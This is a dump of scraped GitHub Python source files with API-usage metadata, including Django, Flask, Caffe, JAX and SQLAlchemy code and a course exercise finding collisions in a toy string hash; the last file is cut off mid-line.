"chromite.lib.cros_logging.error", "line_number": 358, "usage_type": "call"}, {"api_name": "chromite.lib.cros_logging", "line_number": 358, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 359, "usage_type": "call"}, {"api_name": "os.path", "line_number": 359, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_logging.info", "line_number": 369, "usage_type": "call"}, {"api_name": "chromite.lib.cros_logging", "line_number": 369, "usage_type": "name"}, {"api_name": "chromite.lib.cros_logging.info", "line_number": 375, "usage_type": "call"}, {"api_name": "chromite.lib.cros_logging", "line_number": 375, "usage_type": "name"}, {"api_name": "glob.glob", "line_number": 379, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 379, "usage_type": "call"}, {"api_name": "os.path", "line_number": 379, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_logging.warning", "line_number": 392, "usage_type": "call"}, {"api_name": "chromite.lib.cros_logging", "line_number": 392, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 396, "usage_type": "call"}, {"api_name": "os.path", "line_number": 396, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_build_lib.RunCommand", "line_number": 398, "usage_type": "call"}, {"api_name": "chromite.lib.cros_build_lib", "line_number": 398, "usage_type": "name"}, {"api_name": "chromite.lib.cros_logging.info", "line_number": 401, "usage_type": "call"}, {"api_name": "chromite.lib.cros_logging", "line_number": 401, "usage_type": "name"}, {"api_name": "chromite.lib.cros_logging.info", "line_number": 403, "usage_type": "call"}, {"api_name": "chromite.lib.cros_logging", "line_number": 403, "usage_type": "name"}]} +{"seq_id": "18145576519", "text": "from django.contrib import admin\nfrom django.urls import path\nfrom .views import createTutor, findTutor, createMessage, displayMessages\n\napp_name = 'tutor'\nurlpatterns = [\n path('create/', createTutor, name = 'create-tutor'),\n path('find/', findTutor, name='find-tutor'),\n path('create-message/', createMessage, name='create-message'),\n path('display-messages/<str:pk>', displayMessages, name ='display-messages')\n \n]\n\n", "repo_name": "EthanZhang87/TSASoftwareDEV23-24", "sub_path": "Answerly/tutor/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 433, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "views.createTutor", "line_number": 7, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "views.findTutor", "line_number": 8, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "views.createMessage", "line_number": 9, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "views.displayMessages", "line_number": 10, "usage_type": "argument"}]} +{"seq_id": "45560671076", "text": "from enum import IntEnum\n\nimport math\n\nfrom .primitive import Primitive\nfrom ..lumps.texture_lump import TextureInfoLump\nfrom ....utilities.byte_io_mdl import ByteIO\n\n\nclass EmitType(IntEnum):\n emit_surface = 0 # 90 degree spotlight\n emit_point = 1 # simple point light source\n emit_spotlight = 2 # spotlight with penumbra\n emit_skylight = 3 # directional light with no falloff (surface must trace to SKY 
texture)\n    emit_quakelight = 4  # linear falloff, non-lambertian\n    emit_skyambient = 5  # spherical light source with no falloff (surface must trace to SKY texture)\n\n\nclass Color32:\n\n    def __init__(self):\n        self.r, self.g, self.b, self.a = 1, 1, 1, 1\n\n    @staticmethod\n    def from_array(rgba):\n        color = Color32()\n        if len(rgba) >= 4:\n            color.r, color.g, color.b, color.a = rgba\n        color.r, color.g, color.b = rgba[:3]\n        return color\n\n    def magnitude(self):\n        magn = math.sqrt(self.r ** 2 + self.g ** 2 + self.b ** 2)\n        return magn\n\n    def normalize(self):\n        magn = self.magnitude()\n        if magn == 0:\n            return self\n        self.r = self.r / magn\n        self.g = self.g / magn\n        self.b = self.b / magn\n        return self\n\n    def normalized(self):\n        magn = self.magnitude()\n        if magn == 0:\n            return self\n        color = Color32()\n        color.r = self.r / magn\n        color.g = self.g / magn\n        color.b = self.b / magn\n        return color\n\n    def __repr__(self):\n        magn = self.magnitude()\n        if magn == 0:\n            return \"<Color R:0 G:0 B:0>\"\n        r = self.r / magn\n        g = self.g / magn\n        b = self.b / magn\n        return \"<Color R:{} G:{} B:{}>\".format(r, g, b)\n\n    @property\n    def rgba(self):\n        return self.r, self.g, self.b, self.a\n\n    @property\n    def rgb(self):\n        return self.r, self.g, self.b\n\n\nclass WorldLight(Primitive):\n    def __init__(self, lump, bsp):\n        super().__init__(lump, bsp)\n        self.origin = []\n        self.intensity = Color32()\n        self.normal = []\n        self.shadow_cast_offset = []\n        self.cluster = 0\n        self.type = []\n        self.style = 0\n        self.stopdot = 0.0\n        self.stopdot2 = 0.0\n        self.exponent = 0.0\n        self.radius = 0.0\n        self.constant_attn = 0.0\n        self.linear_attn = 0.0\n        self.quadratic_attn = 0.0\n        self.flags = 0\n        self.tex_info_id = 0\n        self.owner = 0\n\n    def parse(self, reader: ByteIO):\n        self.origin = reader.read_fmt('3f')\n        self.intensity = Color32.from_array(reader.read_fmt('3f'))\n        self.normal = reader.read_fmt('3f')\n        if self._bsp.version > 20:\n            self.shadow_cast_offset = reader.read_fmt('3f')\n        self.cluster = reader.read_int32()\n        self.type = EmitType(reader.read_int32())\n        self.style = reader.read_int32()\n        self.stopdot = reader.read_float()\n        self.stopdot2 = reader.read_float()\n        self.exponent = reader.read_float()\n        self.radius = reader.read_float()\n        self.constant_attn = reader.read_float()\n        self.linear_attn = reader.read_float()\n        self.quadratic_attn = reader.read_float()\n        self.flags = reader.read_int32()\n        self.tex_info_id = reader.read_int32()\n        self.owner = reader.read_int32()\n        return self\n\n    @property\n    def tex_info(self):\n        tex_info_lump: TextureInfoLump = self._bsp.get_lump('LUMP_TEXINFO')\n        if tex_info_lump:\n            tex_infos = tex_info_lump.texture_info\n            return tex_infos[self.tex_info_id]\n        return None\n\n    @property\n    def tex_data(self):\n        return self.tex_info.tex_data if self.tex_info else None\n", "repo_name": "stepa2/SourceIO", "sub_path": "source1/bsp/datatypes/world_light.py", "file_name": "world_light.py", "file_ext": "py", "file_size_in_byte": 3695, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "enum.IntEnum", "line_number": 10, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 33, "usage_type": "call"}, {"api_name": "primitive.Primitive", "line_number": 73, "usage_type": "name"}, {"api_name": "utilities.byte_io_mdl.ByteIO", "line_number": 94, "usage_type": "name"}, {"api_name": "lumps.texture_lump.TextureInfoLump", "line_number": 117, "usage_type": "name"}]}\n+{"seq_id": "3590626652", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n\nimport numpy as np\nimport 
cv2\nimport caffe\ncaffe.set_mode_cpu()\n\nmodel_def = '/home/huangrq/vivworkspace/VehicleBack_base_batchsize1_test/VehicleBack.prototxt'\nmodel_weights = '/home/huangrq/vivworkspace/VehicleBack_base_batchsize1_test/VehicleBack.caffemodel' \nnet = caffe.Net(model_def,model_weights,caffe.TEST) \n\ntransformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})\n\n\ntransformer.set_transpose('data', (2,0,1)) # move the image's channel axis to the outermost dimension\ntransformer.set_mean('data', np.array([127.5,127.5,127.5])) # subtract the mean 127.5 from each channel\ntransformer.set_raw_scale('data', 255) # map pixel values from [0,255] into [-1,1]\ntransformer.set_channel_swap('data', (2,1,0)) # swap channels from RGB to BGR\n\n\n\nprint(\"###############################################################\")\nfilename_label = \"/home/huangrq/vivworkspace/VehicleBack_base_batchsize1_test/test_list_w.txt\"\nfile_out=\"/home/huangrq/vivworkspace/VehicleBack_base_batchsize1_test/AC_oncaffe_out.txt\"\nfp = open(filename_label)\nfpout = open(file_out,'w')\nfiledata=fp.readlines()\nfp.close()\nfilepath = list(map(lambda x:x.strip().split()[0],filedata))\nlabel_color=list(map(lambda x:int(x.strip().split()[1]),filedata))\nlabel_model=list(map(lambda x:int(x.strip().split()[2]),filedata))\nlabel_type=list(map(lambda x:int(x.strip().split()[3]),filedata))\nprint(label_color)\n\nmodel_statistic=[0 for i in range(10)]\nfor item in label_model:\n    for i in range(10):\n        if i==item:\n            model_statistic[i] += 1\n            break\nprint(label_model)\ncolor_statistic=[0 for i in range(11)]\nfor item in label_color:\n    for i in range(11):\n        if i==item:\n            color_statistic[i] += 1\n            break\nprint(color_statistic,'\\n',model_statistic)\nmodel,color,types=[],[],[]\n\nfor item in filepath:\n\n    image=caffe.io.load_image('/home/huangrq/vivworkspace/VehicleBack_base_batchsize1_test/'+item)\n    transformed_image=transformer.preprocess('data',image)\n    transformed_image = transformed_image/127.5\n\n    net.blobs['data'].data[...] 
= transformed_image\n    out_put = net.forward()\n\n    \n    model.append(out_put['prob_model'].argmax())\n    color.append(out_put['prob_color'].argmax())\n    types.append(out_put['prob_type'].argmax())\n\n\n\nout_result=list(map(lambda x,y,z,w:w+' model: '+str(x)+' color: '+str(y)+' type: '+str(z)+'\\n',model,color,types,filepath))\nfpout.writelines(out_result)\n\nfpout.close()\n\n\n\n'''\ncompare label and predict\n'''\n\nfrom functools import reduce\nfilename_label = \"/home/huangrq/vivworkspace/VehicleBack_base_batchsize1_test/test_list_w.txt\"\nfile_out=\"/home/huangrq/vivworkspace/VehicleBack_base_batchsize1_test/AC_oncaffe_out.txt\"\nlabel_fp = open(filename_label)\npredict_fp = open(file_out)\nlabel_filedata=label_fp.readlines()\npredict_filedata=predict_fp.readlines()\nlabel_fp.close()\npredict_fp.close()\n\nlabel_filepath = list(map(lambda x:x.strip().split()[0],label_filedata))\nlabel_color=list(map(lambda x:int(x.strip().split()[1]),label_filedata))\nlabel_model=list(map(lambda x:int(x.strip().split()[2]),label_filedata))\nlabel_type=list(map(lambda x:int(x.strip().split()[3]),label_filedata))\n\npredict_filepath = list(map(lambda x:x.strip().split()[0],predict_filedata))\npredict_color=list(map(lambda x:int(x.strip().split()[4]),predict_filedata))\npredict_model=list(map(lambda x:int(x.strip().split()[2]),predict_filedata))\npredict_type=list(map(lambda x:int(x.strip().split()[6]),predict_filedata))\n\nprint(predict_type[4])\nprint(label_type[4])\n\ncolor_match_list=list(map(lambda x,y:x==y,label_color,predict_color))\nmodel_match_list=list(map(lambda x,y:x==y,label_model,predict_model))\ntype_match_list=list(map(lambda x,y:x==y,label_type,predict_type))\n\ncolor_match_num = reduce(lambda x,y:x+y,color_match_list)\nmodel_match_num = reduce(lambda x,y:x+y,model_match_list)\ntype_match_num = reduce(lambda x,y:x+y,type_match_list)\n\nprint(color_match_num,model_match_num,type_match_num)", "repo_name": "Heyrenqiang/work", "sub_path": "scripts/AC_oncaffe_for_VehicleBack.py", "file_name": "AC_oncaffe_for_VehicleBack.py", "file_ext": "py", "file_size_in_byte": 3958, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "caffe.set_mode_cpu", "line_number": 8, "usage_type": "call"}, {"api_name": "caffe.Net", "line_number": 12, "usage_type": "call"}, {"api_name": "caffe.TEST", "line_number": 12, "usage_type": "attribute"}, {"api_name": "caffe.io.Transformer", "line_number": 14, "usage_type": "call"}, {"api_name": "caffe.io", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "caffe.io.load_image", "line_number": 55, "usage_type": "call"}, {"api_name": "caffe.io", "line_number": 55, "usage_type": "attribute"}, {"api_name": "functools.reduce", "line_number": 107, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 108, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 109, "usage_type": "call"}]}\n+{"seq_id": "35332492235", "text": "from django.test import TestCase\nfrom django.urls import reverse\n\nfrom .models.author import Author\nfrom .models.book import Book\nfrom .models.category import Category\n\n\nclass ProductTests(TestCase):\n    def setUp(self):\n        self.author = Author.objects.create(\n            first_name='جورج',\n            last_name='اورول',\n            slug='جورج-اورول',\n        )\n        self.category = Category.objects.create(\n            name='تخیلی',\n            slug='تخیلی',\n        )\n        self.book = Book.objects.create(\n            title='قلعه حیوانات',\n
            number_in_stock='3',\n            unit_price='30000',\n            slug='قلعه-حیوانات',\n        )\n        self.book.authors.add(self.author)\n        self.book.categories.add(self.category)\n\n    def test_string_check(self):\n        self.assertEqual(str(self.book), self.book.title)\n\n    def test_book_content(self):\n        self.assertEqual(self.book.authors.all().first(), self.author)\n        self.assertEqual(self.book.categories.all().first(), self.category)\n\n    def test_product_home_view(self):\n        response = self.client.get(reverse('home'))\n        self.assertEqual(response.status_code, 200)\n        self.assertTemplateUsed(response, 'home.html')\n\n    # def test_get_absolute_url_book(self):\n    #     self.assertEqual(self.book.get_absolute_url(), f'/book/{self.book.slug}/')\n\n    def test_book_delete_view(self):\n        response = self.client.post(\n            reverse('book_delete', args=[self.book.id, ]))\n        self.assertEqual(response.status_code, 302)\n", "repo_name": "MaryamHoushyari/Book-Store", "sub_path": "BookStoreSrc/product/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 1591, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 9, "usage_type": "name"}, {"api_name": "models.author.Author.objects.create", "line_number": 11, "usage_type": "call"}, {"api_name": "models.author.Author.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "models.author.Author", "line_number": 11, "usage_type": "name"}, {"api_name": "models.category.Category.objects.create", "line_number": 16, "usage_type": "call"}, {"api_name": "models.category.Category.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.category.Category", "line_number": 16, "usage_type": "name"}, {"api_name": "models.book.Book.objects.create", "line_number": 20, "usage_type": "call"}, {"api_name": "models.book.Book.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.book.Book", "line_number": 20, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 37, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 46, "usage_type": "call"}]}\n+{"seq_id": "40492781111", "text": "from persistance.persistance import db\nfrom core.models import Student, Lesson\n\nfrom flask import jsonify, abort\nfrom pony.orm import *\nfrom pony.orm.serialization import to_dict\nfrom datetime import datetime, date, timedelta\n\nfrom core.schemas import StudentSchema, LessonSchema\n\n\n@db_session\ndef get_students_list():\n    '''Returns a list of dicts with each student's information'''\n\n    students = Student.select()\n    schema = StudentSchema(many=True)\n    return schema.dump(list(students)).data\n\n\n@db_session\ndef get_student(id: int):\n    \"\"\"Returns a student given an ID\"\"\"\n    try:\n        stud = Student[id]\n        if stud:\n            # Serialize the object via the StudentSchema\n            schema = StudentSchema()\n            return schema.dump(stud).data\n    except ObjectNotFound:\n        abort(404)\n\n\n@db_session\ndef insert_new_student(name: str, address: str, birth_date: date, courseDuration: int, email: str, password: str):\n    flightTimeZero = timedelta(days=0, seconds=0, microseconds=0,\n                               milliseconds=0, minutes=0, hours=0, weeks=0)\n\n    if((Student.get(email=email)) != None):\n        abort(400, 'Email já cadastrado')\n\n    stud = Student(name=name, address=address, email=email, password=password,\n                   birth_date=birth_date, flightTime=flightTimeZero,\n                   licenseAvailable=False, courseDuration=courseDuration)\n\n    commit()\n\n    return {\"endpoint\": 
\"api/students/\" + str(stud.ID)}\n\n\n@db_session\ndef delete_student(ID: int):\n    '''Given an ID, remove a student'''\n\n    try:\n        stud = Student[ID]\n        if stud:\n            stud.delete()\n            commit()\n            return 'Aluno removido com sucesso!'\n    except ObjectNotFound:\n        abort(404)\n\n\n@db_session\ndef update_student(id, **args):\n\n    # not every parameter needs changing, which is why the **args dict is used\n    # args only contains the fields that should be changed\n\n    try: # first, check that the student exists in the DB\n        stud = Student[id]\n    except ObjectNotFound:\n        abort(404)\n    # change only the arguments whose keys are explicitly given in args\n    stud.set(**args)\n    commit()\n    return {\"endpoint\": \"/api/students/\" + str(stud.ID)}\n\n\n@db_session\ndef update_flightTime(id: int, timeToAdd: timedelta):\n    stud = Student[id]\n    stud.flightTime += timeToAdd\n\n    # flightTime is in seconds and courseDuration in hours\n    if(stud.flightTime >= timedelta(seconds=3600*stud.courseDuration)):\n        stud.set(licenseAvailable=True)\n    commit()\n\n\n@db_session\ndef get_lesson_list(id: int):\n    lessons = []\n    lesson_query = Lesson.select()\n    try: # first, check that the student exists in the DB\n        stud = Student[id]\n    except ObjectNotFound:\n        abort(404)\n\n    for l in lesson_query:\n        if l.student.ID == id:\n            e_s = l.expected_start.strftime('%H:%M:%S')\n            e_f = l.expected_finish.strftime('%H:%M:%S')\n            lessons.append(l)\n    schema = LessonSchema(many=True)\n    return schema.dump(list(lessons)).data\n", "repo_name": "douglasramos/pcs3443-escola-aviacao", "sub_path": "src/application/student/use_cases.py", "file_name": "use_cases.py", "file_ext": "py", "file_size_in_byte": 3076, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "core.models.Student.select", "line_number": 16, "usage_type": "call"}, {"api_name": "core.models.Student", "line_number": 16, "usage_type": "name"}, {"api_name": "core.schemas.StudentSchema", "line_number": 17, "usage_type": "call"}, {"api_name": "core.models.Student", "line_number": 25, "usage_type": "name"}, {"api_name": "core.schemas.StudentSchema", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 35, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 36, "usage_type": "call"}, {"api_name": "core.models.Student.get", "line_number": 39, "usage_type": "call"}, {"api_name": "core.models.Student", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 40, "usage_type": "call"}, {"api_name": "core.models.Student", "line_number": 42, "usage_type": "call"}, {"api_name": "core.models.Student", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 62, "usage_type": "call"}, {"api_name": "core.models.Student", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 74, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 82, "usage_type": "name"}, {"api_name": "core.models.Student", "line_number": 83, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 87, "usage_type": "call"}, {"api_name": "core.models.Lesson.select", "line_number": 95, "usage_type": "call"}, {"api_name": "core.models.Lesson", "line_number": 95, "usage_type": "name"}, {"api_name": "core.models.Student", "line_number": 97, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 99, 
"usage_type": "call"}, {"api_name": "core.schemas.LessonSchema", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "29425833192", "text": "from clu import metrics\nfrom flax.training import train_state\nfrom flax import struct\nimport optax\nimport jax.numpy as jnp\nimport jax\nimport tensorflow_datasets as tfds\nimport tensorflow as tf\nfrom cnn_jax_flax import ConvNet\n\n\n@struct.dataclass\nclass Metrics(metrics.Collection):\n accuracy: metrics.Accuracy\n loss: metrics.Average.from_output(\"loss\")\n\n\nclass TrainState(train_state.TrainState):\n metrics: Metrics\n\n\ndef get_datasets(num_epochs, batch_size):\n train_ds = tfds.load(\"mnist\", split=\"train\")\n test_ds = tfds.load(\"mnist\", split=\"test\")\n\n train_ds = train_ds.map(\n lambda sample: {\n \"image\": tf.cast(sample[\"image\"], tf.float32) / 255.0,\n \"label\": sample[\"label\"],\n }\n )\n test_ds = test_ds.map(\n lambda sample: {\n \"image\": tf.cast(sample[\"image\"], tf.float32) / 255.0,\n \"label\": sample[\"label\"],\n }\n )\n train_ds = train_ds.repeat(num_epochs).shuffle(1024)\n train_ds = train_ds.batch(batch_size, drop_remainder=True).prefetch(1)\n test_ds = test_ds.shuffle(1024)\n test_ds = test_ds.batch(batch_size, drop_remainder=True).prefetch(1)\n\n return train_ds, test_ds\n\n\ndef create_train_state(module, rng, learning_rate, momentum):\n params = module.init(rng, jnp.ones([1, 28, 28, 1]))[\"params\"]\n tx = optax.sgd(learning_rate, momentum)\n return TrainState.create(\n apply_fn=module.apply, params=params, tx=tx, metrics=Metrics.empty()\n )\n\n\n@jax.jit\ndef train_step(state, batch):\n def loss_fn(params):\n logits = state.apply_fn({\"params\": params}, batch[\"image\"])\n loss = optax.softmax_cross_entropy_with_integer_labels(\n logits=logits, labels=batch[\"label\"]\n ).mean()\n return loss\n\n grad_fn = jax.grad(loss_fn)\n grads = grad_fn(state.params)\n state = state.apply_gradients(grads=grads)\n return state\n\n\n@jax.jit\ndef compute_metrics(*, state, batch):\n logits = state.apply_fn({\"params\": state.params}, batch[\"image\"])\n loss = optax.softmax_cross_entropy_with_integer_labels(\n logits=logits, labels=batch[\"label\"]\n ).mean()\n metric_updates = state.metrics.single_from_model_output(\n logits=logits, labels=batch[\"label\"], loss=loss\n )\n metrics = state.metrics.merge(metric_updates)\n state = state.replace(metrics=metrics)\n return state\n\n\nif __name__ == \"__main__\":\n num_epochs = 10\n batch_size = 32\n\n train_ds, test_ds = get_datasets(num_epochs, batch_size)\n\n tf.random.set_seed(0)\n init_rng = jax.random.PRNGKey(0)\n\n learning_rate = 0.01\n momentum = 0.9\n\n cnn = ConvNet()\n state = create_train_state(cnn, init_rng, learning_rate, momentum)\n\n # Training\n num_steps_per_epoch = train_ds.cardinality().numpy() // num_epochs\n metrics_history = {\n \"train_loss\": [],\n \"train_accuracy\": [],\n \"test_loss\": [],\n \"test_accuracy\": [],\n }\n for step, batch in enumerate(train_ds.as_numpy_iterator()):\n state = train_step(state, batch)\n state = compute_metrics(state=state, batch=batch)\n\n if (step + 1) % num_steps_per_epoch == 0:\n for metric, value in state.metrics.compute().items():\n metrics_history[f\"train_{metric}\"].append(value)\n state = state.replace(metrics=state.metrics.empty())\n\n test_state = state\n for test_batch in test_ds.as_numpy_iterator():\n test_state = compute_metrics(state=test_state, batch=test_batch)\n\n for metric, value in test_state.metrics.compute().items():\n metrics_history[f\"test_{metric}\"].append(value)\n\n print(\n 
f\"train epoch: {(step+1) // num_steps_per_epoch}, \"\n f\"loss: {metrics_history['train_loss'][-1]}, \"\n f\"accuracy: {metrics_history['train_accuracy'][-1] * 100}\"\n )\n print(\n f\"test epoch: {(step+1) // num_steps_per_epoch}, \"\n f\"loss: {metrics_history['test_loss'][-1]}, \"\n f\"accuracy: {metrics_history['test_accuracy'][-1] * 100}\"\n )\n", "repo_name": "satojkovic/cnn-jax-flax", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 4108, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "clu.metrics.Collection", "line_number": 13, "usage_type": "attribute"}, {"api_name": "clu.metrics", "line_number": 13, "usage_type": "name"}, {"api_name": "clu.metrics.Accuracy", "line_number": 14, "usage_type": "attribute"}, {"api_name": "clu.metrics", "line_number": 14, "usage_type": "name"}, {"api_name": "clu.metrics.Average.from_output", "line_number": 15, "usage_type": "call"}, {"api_name": "clu.metrics.Average", "line_number": 15, "usage_type": "attribute"}, {"api_name": "clu.metrics", "line_number": 15, "usage_type": "name"}, {"api_name": "flax.struct.dataclass", "line_number": 12, "usage_type": "attribute"}, {"api_name": "flax.struct", "line_number": 12, "usage_type": "name"}, {"api_name": "flax.training.train_state.TrainState", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flax.training.train_state", "line_number": 18, "usage_type": "name"}, {"api_name": "clu.metrics", "line_number": 19, "usage_type": "name"}, {"api_name": "tensorflow_datasets.load", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow_datasets.load", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 34, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 34, "usage_type": "attribute"}, {"api_name": "jax.numpy.ones", "line_number": 47, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 47, "usage_type": "name"}, {"api_name": "optax.sgd", "line_number": 48, "usage_type": "call"}, {"api_name": "optax.softmax_cross_entropy_with_integer_labels", "line_number": 58, "usage_type": "call"}, {"api_name": "jax.grad", "line_number": 63, "usage_type": "call"}, {"api_name": "jax.jit", "line_number": 54, "usage_type": "attribute"}, {"api_name": "optax.softmax_cross_entropy_with_integer_labels", "line_number": 72, "usage_type": "call"}, {"api_name": "clu.metrics", "line_number": 78, "usage_type": "name"}, {"api_name": "clu.metrics", "line_number": 79, "usage_type": "name"}, {"api_name": "jax.jit", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.random.set_seed", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 89, "usage_type": "attribute"}, {"api_name": "jax.random.PRNGKey", "line_number": 90, "usage_type": "call"}, {"api_name": "jax.random", "line_number": 90, "usage_type": "attribute"}, {"api_name": "cnn_jax_flax.ConvNet", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "21969777354", "text": "from typing import Optional\nfrom sqlalchemy import create_engine\nfrom sqlalchemy import update, delete\nfrom sqlalchemy.orm import sessionmaker\n\nfrom utils.db_api.base import Base\nfrom utils.db_api.models import Users\n\ndb_string = r\"sqlite:///database.db\"\ndb = create_engine(db_string) 
\n\nSession = sessionmaker(db) \nsession = Session()\n\nBase.metadata.create_all(db)\n\n\nclass Database:\n # ---Users---\n def reg_user(self, user_id: str, username: str, name: str, insta: str, contact: str):\n \"\"\"Some docs\"\"\"\n session.merge(Users(user_id = user_id, \n username = username,\n name = name,\n insta = insta,\n contact = contact\n )\n )\n session.commit()\n \n\n def get_user(self, user_id) -> Users:\n \"\"\"Some docs\"\"\"\n response = session.query(Users).filter(Users.user_id == user_id).first()\n return response\n\n \n def update_status(self, user_id):\n \"\"\"Some docs\"\"\"\n session.execute(\n update(Users).filter(Users.user_id == user_id).\n values(status = 'payed')\n )\n session.commit()\n \n\n def get_row_count(self):\n response = session.query(Users).count()\n return response", "repo_name": "KarimovMurodilla/secret-channel", "sub_path": "utils/misc/connection.py", "file_name": "connection.py", "file_ext": "py", "file_size_in_byte": 1341, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 12, "usage_type": "call"}, {"api_name": "utils.db_api.base.Base.metadata.create_all", "line_number": 15, "usage_type": "call"}, {"api_name": "utils.db_api.base.Base.metadata", "line_number": 15, "usage_type": "attribute"}, {"api_name": "utils.db_api.base.Base", "line_number": 15, "usage_type": "name"}, {"api_name": "utils.db_api.models.Users", "line_number": 22, "usage_type": "call"}, {"api_name": "utils.db_api.models.Users", "line_number": 34, "usage_type": "argument"}, {"api_name": "utils.db_api.models.Users.user_id", "line_number": 34, "usage_type": "attribute"}, {"api_name": "utils.db_api.models.Users", "line_number": 32, "usage_type": "name"}, {"api_name": "sqlalchemy.update", "line_number": 41, "usage_type": "call"}, {"api_name": "utils.db_api.models.Users", "line_number": 41, "usage_type": "argument"}, {"api_name": "utils.db_api.models.Users.user_id", "line_number": 41, "usage_type": "attribute"}, {"api_name": "utils.db_api.models.Users", "line_number": 48, "usage_type": "argument"}]} +{"seq_id": "34994781660", "text": "\"\"\"\nImplement a hash function simple_hash that given a string s,\ncomputes its hash as follows:\nit starts with r = 7, and for every character in the string,\nmultiplies r by 31,\nadds that character to r,\nand keeps everything modulo 2 power 16.\n\"\"\"\n\n\nfrom string import ascii_lowercase\nimport itertools\n\nlorem = \"\"\"\nLorem ipsum dolor sit amet, consectetur adipiscing elit.\nDonec id sem magna. Nunc fermentum nisl et justo ullamcorper luctus.\nPhasellus metus magna, ornare at laoreet sit amet, rutrum efficitur dui.\nVivamus ut eleifend ante.\nPhasellus sodales nec risus sit amet viverra.\nFusce id viverra lectus, eu rutrum ex. Suspendisse pulvinar. 
tttt\n\"\"\"\npower = pow(2, 16)\n\n\ndef simple_hash(s):\n    r = 7\n    for char in s:\n        r = r * 31\n        r = r + ord(char)\n    return r % power\n\n\ndef simple_crack(hash, lorem):\n    # with 2 ** 16 solutions, ascii_lowercase, repeat=5 is large enough.\n    test_list = [\"\".join(item) for item in itertools.product(ascii_lowercase, repeat=5)]\n    for item in test_list:\n        output = simple_hash(item)\n        if output == hash and item != lorem:\n            return output, item\n\n\nif __name__ == \"__main__\":\n    lorem = lorem\n    hash = simple_hash(lorem)\n    print(\"Value lorem:\", hash)\n\n    output, item = simple_crack(hash, lorem)\n    print(output, item)\n", "repo_name": "Fabrice-64/cours_tel_aviv", "sub_path": "12_hashing_algo.py", "file_name": "12_hashing_algo.py", "file_ext": "py", "file_size_in_byte": 1303, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "itertools.product", "line_number": 35, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 35, "usage_type": "argument"}]}\n+{"seq_id": "34994781660", "text": "import itertools,numpy\nimport sys\nsys.path.insert(0, '/Users/yli/code/conway99')\nfrom conway99 import *\nimport numpy as np\n\ndef initial_vertex_clusters(b):\n    vertex_clusters = itertools.product(range(3),[0,1],[0,1])\n    return vertex_clusters\n\n# Test whether this vertex's sibling has already been matched into the same major group; return False if so\ndef test_sibling_group(current_vertex, vertex_for_test):\n    if current_vertex[2] == 0:\n        sibling_vertex = (current_vertex[0], current_vertex[1], 1)\n    else:\n        sibling_vertex = (current_vertex[0], current_vertex[1], 0)\n    #print(\"the sibling for test is: %s\" % str(sibling_vertex))\n    #print(\"current solution stack is %s\" % str(current_solution_stack))\n    for vertex_group in current_solution_stack:\n        #print(\"the group in current stack 